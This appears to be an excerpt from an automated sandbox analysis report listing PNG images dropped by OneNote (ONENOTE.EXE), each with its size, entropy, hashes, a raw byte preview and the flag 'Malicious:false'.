                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
